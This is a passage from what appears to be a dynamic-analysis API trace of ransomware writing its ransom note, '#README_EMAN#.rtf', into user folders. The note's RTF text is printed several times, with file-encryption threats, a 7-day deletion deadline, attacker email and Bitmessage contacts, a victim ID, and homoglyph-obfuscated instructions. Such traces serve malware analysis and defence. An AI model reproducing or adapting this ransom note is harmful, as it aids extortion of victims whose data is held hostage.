\\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.311] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0289.311] WriteFile (in: hFile=0x2e8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.312] CloseHandle (hObject=0x2e8) returned 1 [0289.312] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\#readme_eman#.rtf")) returned 0xffffffff [0289.312] GetLastError () returned 0x2 [0289.312] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.315] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 